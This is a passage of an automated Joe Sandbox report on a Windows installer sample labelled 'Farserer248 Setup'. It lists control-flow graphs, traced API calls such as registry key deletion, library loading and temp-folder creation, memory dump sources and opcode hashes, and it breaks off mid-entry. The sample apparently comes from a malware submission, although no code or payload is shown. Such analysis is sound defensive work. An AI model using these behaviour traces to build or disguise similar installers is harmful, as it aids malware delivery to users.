                          control_flow_graph 851 40141e-401456 call 4062fe 853 40145b-40145d 851->853 854 401463-40146d 853->854 855 401527-401530 853->855 856 401493-4014a4 854->856 857 40146f-401491 RegEnumValueW 854->857 859 4014ce-4014d6 RegEnumKeyW 856->859 857->856 858 401503-401512 RegCloseKey 857->858 858->855 860 4014a6-4014a8 859->860 861 4014d8-4014eb RegCloseKey call 40690c 859->861 860->858 862 4014aa-4014c1 call 40141e 860->862 867 401514-40151e 861->867 868 4014ed-401501 RegDeleteKeyW 861->868 862->861 869 4014c3-4014cd 862->869 867->855 868->855 869->859
                          APIs
                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                          • RegCloseKey.ADVAPI32(?), ref: 004014DC
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                          • RegCloseKey.ADVAPI32(?), ref: 00401507
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CloseEnum$DeleteValue
                          • String ID:
                          • API String ID: 1354259210-0
                          • Opcode ID: a8b72c705e56ca43a24f57969f8c6ebf93f1d97ce7dc5c3ac1486de5659fe1a6
                          • Instruction ID: 77efb6e904de7075251eb55676859da4108275a5579d21884575cfbf3c1c4ffb
                          • Opcode Fuzzy Hash: a8b72c705e56ca43a24f57969f8c6ebf93f1d97ce7dc5c3ac1486de5659fe1a6
                          • Instruction Fuzzy Hash: 0D218231108244BBD7219F51DD04FAB7BADEF99354F01043EF985A11B0D7359A149A6A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 870 401dba-401dd8 call 403002 * 2 875 401dda-401de7 call 40303e 870->875 876 401deb-401ded 870->876 875->876 878 401df8-401dff 876->878 879 401def-401df6 call 40303e 876->879 882 401e50-401e75 call 40303e * 2 FindWindowExW 878->882 883 401e01-401e1c call 403002 * 2 878->883 879->878 895 401e7b 882->895 893 401e41-401e4e SendMessageW 883->893 894 401e1e-401e3f SendMessageTimeoutW 883->894 893->895 896 401e7f-401e83 894->896 895->896 897 402ea1-402eb7 896->897 898 401e89 896->898 898->897
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 51a050af1b716c0048941b3f506e03fcf89cda2ee53de88fa27be671efa8297c
                          • Instruction ID: 2f2149dc751229fbb30c604244a48d6d78524570e860c2be8433f4d2860ceba6
                          • Opcode Fuzzy Hash: 51a050af1b716c0048941b3f506e03fcf89cda2ee53de88fa27be671efa8297c
                          • Instruction Fuzzy Hash: 9321F471609301AFE714AF21C846A2FBBE8EF84755F00093FF585A61D0D6B99E05CA5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 902 40690c-406922 GetModuleHandleA 903 406924-406925 call 4061c4 902->903 904 40692e-406936 GetProcAddress 902->904 907 40692a-40692c 903->907 906 40693c-40693e 904->906 907->904 907->906
                          APIs
                          • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000C), ref: 0040691A
                          • GetProcAddress.KERNEL32(00000000), ref: 00406936
                            • Part of subcall function 004061C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061DB
                            • Part of subcall function 004061C4: wsprintfW.USER32 ref: 00406217
                            • Part of subcall function 004061C4: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040622B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                          • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                          • API String ID: 2547128583-890815371
                          • Opcode ID: 3e5ecee338391c1f835af8bcbf51dfcb16336eafe0267e1191ddbe1c7e1cec0d
                          • Instruction ID: 80678e2fb4a7a6979b06596d185cf774df534ff69d79561b472b2c0d498747b3
                          • Opcode Fuzzy Hash: 3e5ecee338391c1f835af8bcbf51dfcb16336eafe0267e1191ddbe1c7e1cec0d
                          • Instruction Fuzzy Hash: 4DD02B36101215E7C7002F216E0884FBB5DDF663607010436F501F2271D738C42285FD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,00000800,?,00000800,?,?,?,: Completed,00000000,00000000,?,00405FCF), ref: 004069E4
                          • RegCloseKey.KERNELBASE(?), ref: 004069EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID: : Completed
                          • API String ID: 3356406503-2954849223
                          • Opcode ID: 843227a38e9d42b110fc0d9566235887c0b847de959c2867f777273aa9976b3c
                          • Instruction ID: a36d519718e890228eaa374ca5b8e64310d4445f69706a10c246fc5402a65521
                          • Opcode Fuzzy Hash: 843227a38e9d42b110fc0d9566235887c0b847de959c2867f777273aa9976b3c
                          • Instruction Fuzzy Hash: 18014C7661010AAEDF219FA8DD06ADB7BE8EF49344F114136B802F2160D234DA64DBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • OleInitialize.OLE32(00000000), ref: 004058A9
                            • Part of subcall function 0040551D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040552F
                          • OleUninitialize.OLE32(00000404,00000000), ref: 004058F5
                            • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                            • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                          Strings
                          • Farserer248 Setup: Completed, xrefs: 00405899
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: MessageSend$InitializeUninitialize
                          • String ID: Farserer248 Setup: Completed
                          • API String ID: 1011633862-2307343146
                          • Opcode ID: 40a16f44f5e8a13ad4ff7ab065eee26cc22f723808b8c65aba7eafe1e1020eaa
                          • Instruction ID: 185011804211b685db9bb7642dcfb4f4a29fa32321b345d0848211e237b5a29b
                          • Opcode Fuzzy Hash: 40a16f44f5e8a13ad4ff7ab065eee26cc22f723808b8c65aba7eafe1e1020eaa
                          • Instruction Fuzzy Hash: EDF0B477700A00AAE6227B54ED01B5777B4EBD0319F41843EEE89B22E0DB754C528F5D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CFE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A3), ref: 00405E5B
                          • GetLastError.KERNEL32 ref: 00405E65
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E53
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CreateDirectoryErrorLast
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 1375471231-3081826266
                          • Opcode ID: 00dec7d9cd160db4e52b789778cb879efdc981252dd7a61cd1af44f9212731dd
                          • Instruction ID: 5859f427c5498e70eba6a6baa4b6a152232f49d489ffaa42f1d2507b6d6f6ac2
                          • Opcode Fuzzy Hash: 00dec7d9cd160db4e52b789778cb879efdc981252dd7a61cd1af44f9212731dd
                          • Instruction Fuzzy Hash: 5BC012327001309BC3601B75AE08547AE54DB116E13064539B988E1110D6304C1086E8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 683f2bfd829e53f0f2c160aa0b6fcf399eacfd528cce75756187b225a6b249dc
                          • Instruction ID: feb15d8ac423df11d484831e3fa9f1042f2dd77ca5ab5b89a121ecef13cf7db2
                          • Opcode Fuzzy Hash: 683f2bfd829e53f0f2c160aa0b6fcf399eacfd528cce75756187b225a6b249dc
                          • Instruction Fuzzy Hash: 1D913371A0C7808BE364CF29C480B6BBBE1ABC9344F10892EE5D9E7391D774A845CB57
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040228C
                            • Part of subcall function 00405D6F: lstrlenW.KERNEL32(Completed,?,00000000,?,?), ref: 00405DA1
                            • Part of subcall function 00405D6F: lstrlenW.KERNEL32(?,Completed,?,00000000,?,?), ref: 00405DB3
                            • Part of subcall function 00405D6F: lstrcatW.KERNEL32(Completed,?), ref: 00405DCE
                            • Part of subcall function 00405D6F: SetWindowTextW.USER32(Completed,Completed), ref: 00405DE6
                            • Part of subcall function 00405D6F: SendMessageW.USER32(?), ref: 00405E0D
                            • Part of subcall function 00405D6F: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405E28
                            • Part of subcall function 00405D6F: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E35
                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004022A0
                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                          • String ID:
                          • API String ID: 334405425-0
                          • Opcode ID: a7d3bafa5e6b0678f1117379dabcb590f233fbc7114db0d5526c93f2f76fa94d
                          • Instruction ID: 8517b872d002c9ff263ef808374354244b171902ad5141c60be81ecd0f6b9bbc
                          • Opcode Fuzzy Hash: a7d3bafa5e6b0678f1117379dabcb590f233fbc7114db0d5526c93f2f76fa94d
                          • Instruction Fuzzy Hash: 97210632644301ABC711AF619E49A3F7694AF94721F20013FF941B12C1DBBC8802965F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(0040B0E8,00000023,?,00000011,00000002), ref: 004026C3
                          • RegSetValueExW.KERNELBASE(?,?,?,?,0040B0E8,?,?,00000011,00000002), ref: 00402710
                          • RegCloseKey.ADVAPI32(?,?,?,0040B0E8,?,?,00000011,00000002), ref: 0040271D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CloseValuelstrlen
                          • String ID:
                          • API String ID: 2655323295-0
                          • Opcode ID: 952bb6d7c8d57d15a8ef7defbc6e0c5b0878e4382beffd97acd7654b540214f0
                          • Instruction ID: 577582608b70553307347a07f8070e1a5951a9265267386637c938975cf78b94
                          • Opcode Fuzzy Hash: 952bb6d7c8d57d15a8ef7defbc6e0c5b0878e4382beffd97acd7654b540214f0
                          • Instruction Fuzzy Hash: 66210032604300ABD7119FA0CD45B2FBBE8EB88760F10083EF181F31C0C7B99905879A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GlobalFree.KERNEL32(00000000), ref: 00401D81
                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401D93
                            • Part of subcall function 00405ECE: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Global$AllocFreelstrcat
                          • String ID: #32770
                          • API String ID: 238967769-463685578
                          • Opcode ID: 81542b20edc2233ee64623bb86dd9a2a0f5aecf4cca44fdc5785cc60253cde8c
                          • Instruction ID: 7a97e807c60a67b8b63991fa3d2b0c5fe5153687e9ba530db717405b2fde2bf0
                          • Opcode Fuzzy Hash: 81542b20edc2233ee64623bb86dd9a2a0f5aecf4cca44fdc5785cc60253cde8c
                          • Instruction Fuzzy Hash: E011CD72A41310ABD720EF50D940A2B72A8AF04718B05443BFE46B72D1C778A8109B9E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004027E8
                          • RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004027FC
                          • RegCloseKey.ADVAPI32(00000000,?,?), ref: 00402818
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: Enum$CloseValue
                          • String ID:
                          • API String ID: 397863658-0
                          • Opcode ID: e4a869243f2fb182c59e31d0911ab79aa47c196e1a6b4910a047185eaaf5f54b
                          • Instruction ID: 9ed3e60ac52a06b2151d5ec02d436f9dddfc68f07ac9e87e8259fc0244004f81
                          • Opcode Fuzzy Hash: e4a869243f2fb182c59e31d0911ab79aa47c196e1a6b4910a047185eaaf5f54b
                          • Instruction Fuzzy Hash: 6B01B531658341ABD3189F61ED88D3BB79CFF85315F11093EF542A2180D7B86904866A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegCloseKey.ADVAPI32(?,?,?,0040B0E8,?,?,00000011,00000002), ref: 0040271D
                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040275E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: ed2639e677f6e5cde9149b88e97d54d192fe3c6a1fc7557abcda9ac58675f940
                          • Instruction ID: 362dd49e9046cb744f8f8912aeb7b1ec941aa59feb9e40915e88316d6d73047e
                          • Opcode Fuzzy Hash: ed2639e677f6e5cde9149b88e97d54d192fe3c6a1fc7557abcda9ac58675f940
                          • Instruction Fuzzy Hash: 5611C235658302AFD7548FA4DA88A3BB3A4EF84319F10093FF542A21D1D7BC5A09CB5B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                          • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
